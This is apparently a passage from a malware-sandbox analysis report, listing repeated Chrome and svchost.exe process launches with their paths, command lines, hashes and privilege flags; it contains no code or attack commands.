                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                            Start time:12:42:34
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,5631293592904426678,1728656617054090218,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                            Start time:12:42:34
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                            Start time:12:42:37
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                            Start time:12:42:37
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1152,i,8013400789958701554,8044825980928044458,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                            Start time:12:42:41
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                            Start time:12:42:41
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1976,i,9020892517801786784,10645353824597710220,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                            Start time:12:42:42
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                            Start time:12:42:46
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                            Start time:12:42:46
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1972,i,9724548607629697657,13638253049410839489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                            Start time:12:42:49
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                            Start time:12:42:50
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                            Start time:12:42:50
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1964,i,11798321828357005052,16972695017880113129,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                            Start time:12:42:54
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:51
                                                                                                                                                                                            Start time:12:42:54
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1988,i,12758286000912440692,11284502875771047049,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:52
                                                                                                                                                                                            Start time:12:42:59
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:53
                                                                                                                                                                                            Start time:12:43:00
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1944,i,4936340759003262573,15814975481951039996,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:54
                                                                                                                                                                                            Start time:12:43:00
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:55
                                                                                                                                                                                            Start time:12:43:03
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:56
                                                                                                                                                                                            Start time:12:43:03
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1984,i,3689067430776497247,15300495909368681371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:57
                                                                                                                                                                                            Start time:12:43:07
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:58
                                                                                                                                                                                            Start time:12:43:07
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1972,i,8812933395650124059,17698073702536386733,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:59
                                                                                                                                                                                            Start time:12:43:08
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:60
                                                                                                                                                                                            Start time:12:43:11
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:61
                                                                                                                                                                                            Start time:12:43:11
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1936,i,2605296248091638972,4924302696092150325,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:63
                                                                                                                                                                                            Start time:12:43:16
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:64
                                                                                                                                                                                            Start time:12:43:16
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1472 --field-trial-handle=1980,i,15377228353991002800,792711668187999877,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:65
                                                                                                                                                                                            Start time:12:43:16
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:66
                                                                                                                                                                                            Start time:12:43:21
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:67
                                                                                                                                                                                            Start time:12:43:22
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1460 --field-trial-handle=1996,i,306334268389520684,17870841813551360438,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:68
                                                                                                                                                                                            Start time:12:43:24
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:69
                                                                                                                                                                                            Start time:12:43:25
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1992,i,3378677205698214136,1924167881851413353,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
